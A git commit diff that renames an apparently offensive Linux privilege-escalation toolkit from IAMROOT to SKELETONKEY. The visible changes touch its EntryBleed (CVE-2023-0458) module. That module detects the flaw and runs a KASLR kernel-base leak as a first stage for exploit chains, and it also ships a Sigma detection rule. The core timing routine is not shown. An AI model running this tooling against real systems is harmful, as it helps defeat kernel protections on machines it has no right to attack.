rename: IAMROOT → SKELETONKEY across the entire project

Breaking change. Tool name, binary name, function/type names, constant names, env vars, header guards, file paths, and GitHub repo URL all rebrand IAMROOT → SKELETONKEY. Changes: - All "IAMROOT" → "SKELETONKEY" (constants, env vars, enum values, docs, comments) - All "iamroot" → "skeletonkey" (functions, types, paths, CLI) - iamroot.c → skeletonkey.c - modules/*/iamroot_modules.{c,h} → modules/*/skeletonkey_modules.{c,h} - tools/iamroot-fleet-scan.sh → tools/skeletonkey-fleet-scan.sh - Binary "iamroot" → "skeletonkey" - GitHub URL KaraZajac/IAMROOT → KaraZajac/SKELETONKEY - .gitignore now expects build output named "skeletonkey" - /tmp/iamroot-* tmpfiles → /tmp/skeletonkey-* - Env vars IAMROOT_MODPROBE_PATH etc. → SKELETONKEY_* New ASCII skeleton-key banner (horizontal key icon + ANSI Shadow SKELETONKEY block letters) replaces the IAMROOT banner in skeletonkey.c and README.md. VERSION: 0.3.1 → 0.4.0 (breaking). Build clean on Debian 6.12.86. `skeletonkey --version` → 0.4.0. All 24 modules still register; no functional code changes — pure rename + banner refresh.
2026-05-16 22:43:49 -04:00
parent 9d88b475c1
commit 9593d90385
109 changed files with 1711 additions and 1701 deletions
@@ -45,7 +45,7 @@ There is no single canonical patch. Partial mitigations include:
 - Lift the proven EntryBleed code from
  `SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` into
  `module.c` here
- Expose as both a CLI mode (`iamroot --leak-kbase`) and as a
+- Expose as both a CLI mode (`skeletonkey --leak-kbase`) and as a
  library helper (`uint64_t entrybleed_leak_kbase(void)`)
 - Detection rules: timing-attack pattern flags, perf-counter
  anomaly detection (informational — these are hard to make precise
@@ -14,10 +14,10 @@ Discovered by **Will Findlay**. Formally presented at USENIX Security '23:

 Mainline status: no canonical patch — partial mitigations only.

-## IAMROOT role
+## SKELETONKEY role

 This is a **stage-1 leak primitive**, not a standalone LPE. Other
 modules can call `entrybleed_leak_kbase_lib()` to obtain a KASLR
 slide and feed it to the offset resolver in `core/offsets.c`. x86_64
 only; the `entry_SYSCALL_64` slot offset is configurable via the
-`IAMROOT_ENTRYBLEED_OFFSET` env var.
+`SKELETONKEY_ENTRYBLEED_OFFSET` env var.
@@ -1,5 +1,5 @@
 /*
- * entrybleed_cve_2023_0458 — IAMROOT module
+ * entrybleed_cve_2023_0458 — SKELETONKEY module
 *
 * EntryBleed (Lipp et al., USENIX Security '23). A KPTI prefetchnta
 * timing side-channel that leaks the kernel base address.
@@ -13,10 +13,10 @@
 *     anti-EntryBleed mitigation = VULNERABLE.
 *   - This module is also a LIBRARY: other modules that need a kbase
 *     leak as part of a chain can call `entrybleed_leak_kbase_lib()`
- *     directly (declared in iamroot_modules.h).
+ *     directly (declared in skeletonkey_modules.h).
 *
 * x86_64 only. On ARM64 / other arches, detect() returns
- * IAMROOT_PRECOND_FAIL and exploit() returns IAMROOT_PRECOND_FAIL.
+ * SKELETONKEY_PRECOND_FAIL and exploit() returns SKELETONKEY_PRECOND_FAIL.
 *
 * For users who'd never go to USENIX (TLDR):
 *   - KPTI unmaps kernel pages from user CR3 on kernel-exit, but leaves
@@ -30,7 +30,7 @@
 *   - Subtract its known offset from kbase → KASLR slide
 */

-#include "iamroot_modules.h"
+#include "skeletonkey_modules.h"
 #include "../../core/registry.h"

 #include <stdio.h>
@@ -120,7 +120,7 @@ static int read_first_line(const char *path, char *out, size_t n)
    return 0;
 }

-static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t entrybleed_detect(const struct skeletonkey_ctx *ctx)
 {
    /* Probe KPTI status. /sys/devices/system/cpu/vulnerabilities/meltdown
     * is the most direct signal: "Mitigation: PTI" means KPTI is on
@@ -134,7 +134,7 @@ static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
            fprintf(stderr, "[?] entrybleed: cannot read meltdown vuln status — "
                            "assuming KPTI on (conservative)\n");
        }
-        return IAMROOT_VULNERABLE;
+        return SKELETONKEY_VULNERABLE;
    }
    if (!ctx->json) {
        fprintf(stderr, "[i] entrybleed: meltdown status = '%s'\n", buf);
@@ -146,7 +146,7 @@ static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
            fprintf(stderr, "[+] entrybleed: CPU is Meltdown-immune; KPTI off; "
                            "EntryBleed N/A\n");
        }
-        return IAMROOT_OK;
+        return SKELETONKEY_OK;
    }

    /* "Mitigation: PTI" or "Vulnerable" or similar — KPTI is most likely
@@ -178,7 +178,7 @@ static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
                fprintf(stderr, "[!] entrybleed: ACTIVE PROBE CONFIRMED — "
                                "leak yields plausible kbase 0x%lx\n", kbase);
            }
-            return IAMROOT_VULNERABLE;
+            return SKELETONKEY_VULNERABLE;
        }
        if (!ctx->json) {
            fprintf(stderr, "[+] entrybleed: active probe returned implausible kbase "
@@ -186,9 +186,9 @@ static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
        }
        /* Implausible probe result. Either the entry_SYSCALL_64 slot
         * offset doesn't match lts-6.12.x default (different kernel
-         * build) — user should set IAMROOT_ENTRYBLEED_OFFSET — or
+         * build) — user should set SKELETONKEY_ENTRYBLEED_OFFSET — or
         * timing is too noisy. Don't claim CONFIRMED. */
-        return IAMROOT_TEST_ERROR;
+        return SKELETONKEY_TEST_ERROR;
    }

    if (!ctx->json) {
@@ -197,21 +197,21 @@ static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
        fprintf(stderr, "[i] entrybleed: --exploit will leak kbase (harmless leak; "
                        "no /etc/passwd writes)\n");
    }
-    return IAMROOT_VULNERABLE;
+    return SKELETONKEY_VULNERABLE;
 }

-static iamroot_result_t entrybleed_exploit(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t entrybleed_exploit(const struct skeletonkey_ctx *ctx)
 {
-    const char *off_env = getenv("IAMROOT_ENTRYBLEED_OFFSET");
+    const char *off_env = getenv("SKELETONKEY_ENTRYBLEED_OFFSET");
    unsigned long off = 0;
    if (off_env) {
        off = strtoul(off_env, NULL, 0);
        if (!ctx->json) {
-            fprintf(stderr, "[i] entrybleed: using IAMROOT_ENTRYBLEED_OFFSET=0x%lx\n", off);
+            fprintf(stderr, "[i] entrybleed: using SKELETONKEY_ENTRYBLEED_OFFSET=0x%lx\n", off);
        }
    } else if (!ctx->json) {
        fprintf(stderr, "[i] entrybleed: using default entry_SYSCALL_64 slot offset "
-                        "0x%lx (lts-6.12.x). Override via IAMROOT_ENTRYBLEED_OFFSET=0x...\n",
+                        "0x%lx (lts-6.12.x). Override via SKELETONKEY_ENTRYBLEED_OFFSET=0x...\n",
                DEFAULT_ENTRY_OFF);
    }

@@ -223,7 +223,7 @@ static iamroot_result_t entrybleed_exploit(const struct iamroot_ctx *ctx)
    unsigned long kbase = entrybleed_leak_kbase_lib(off);
    if (kbase == 0) {
        fprintf(stderr, "[-] entrybleed: leak failed (kbase == 0)\n");
-        return IAMROOT_EXPLOIT_FAIL;
+        return SKELETONKEY_EXPLOIT_FAIL;
    }

    if (ctx->json) {
@@ -233,7 +233,7 @@ static iamroot_result_t entrybleed_exploit(const struct iamroot_ctx *ctx)
        fprintf(stderr, "[+] entrybleed: KASLR slide = 0x%lx (relative to 0xffffffff81000000)\n",
                kbase - 0xffffffff81000000UL);
    }
-    return IAMROOT_EXPLOIT_OK;
+    return SKELETONKEY_EXPLOIT_OK;
 }

 #else /* not x86_64 */
@@ -244,19 +244,19 @@ unsigned long entrybleed_leak_kbase_lib(unsigned long off)
    return 0;
 }

-static iamroot_result_t entrybleed_detect(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t entrybleed_detect(const struct skeletonkey_ctx *ctx)
 {
    (void)ctx;
    fprintf(stderr, "[i] entrybleed: x86_64 only; this build is for a "
                    "different architecture\n");
-    return IAMROOT_PRECOND_FAIL;
+    return SKELETONKEY_PRECOND_FAIL;
 }

-static iamroot_result_t entrybleed_exploit(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t entrybleed_exploit(const struct skeletonkey_ctx *ctx)
 {
    (void)ctx;
    fprintf(stderr, "[-] entrybleed: x86_64 only\n");
-    return IAMROOT_PRECOND_FAIL;
+    return SKELETONKEY_PRECOND_FAIL;
 }

 #endif
@@ -268,7 +268,7 @@ static iamroot_result_t entrybleed_exploit(const struct iamroot_ctx *ctx)
 * Ship a Sigma note describing this; auditd rule intentionally omitted. */
 static const char entrybleed_sigma[] =
    "title: EntryBleed-style KPTI timing side-channel (CVE-2023-0458)\n"
-    "id: 7b3a48d1-iamroot-entrybleed\n"
+    "id: 7b3a48d1-skeletonkey-entrybleed\n"
    "status: experimental\n"
    "description: |\n"
    "  EntryBleed leaks kbase via prefetchnta timing against entry_SYSCALL_64.\n"
@@ -280,7 +280,7 @@ static const char entrybleed_sigma[] =
    "level: informational\n"
    "tags: [attack.discovery, attack.t1082, cve.2023.0458]\n";

-const struct iamroot_module entrybleed_module = {
+const struct skeletonkey_module entrybleed_module = {
    .name           = "entrybleed",
    .cve            = "CVE-2023-0458",
    .summary        = "KPTI prefetchnta timing side-channel → kbase leak (stage-1)",
@@ -296,7 +296,7 @@ const struct iamroot_module entrybleed_module = {
    .detect_falco   = NULL,
 };

-void iamroot_register_entrybleed(void)
+void skeletonkey_register_entrybleed(void)
 {
-    iamroot_register(&entrybleed_module);
+    skeletonkey_register(&entrybleed_module);
 }
@@ -1,13 +1,13 @@
 /*
- * entrybleed_cve_2023_0458 — IAMROOT module registry hook
+ * entrybleed_cve_2023_0458 — SKELETONKEY module registry hook
 */

-#ifndef ENTRYBLEED_IAMROOT_MODULES_H
-#define ENTRYBLEED_IAMROOT_MODULES_H
+#ifndef ENTRYBLEED_SKELETONKEY_MODULES_H
+#define ENTRYBLEED_SKELETONKEY_MODULES_H

 #include "../../core/module.h"

-extern const struct iamroot_module entrybleed_module;
+extern const struct skeletonkey_module entrybleed_module;

 /* Library entry point for other modules that need a kbase leak.
 * Returns the leaked kernel _text base on success, or 0 on failure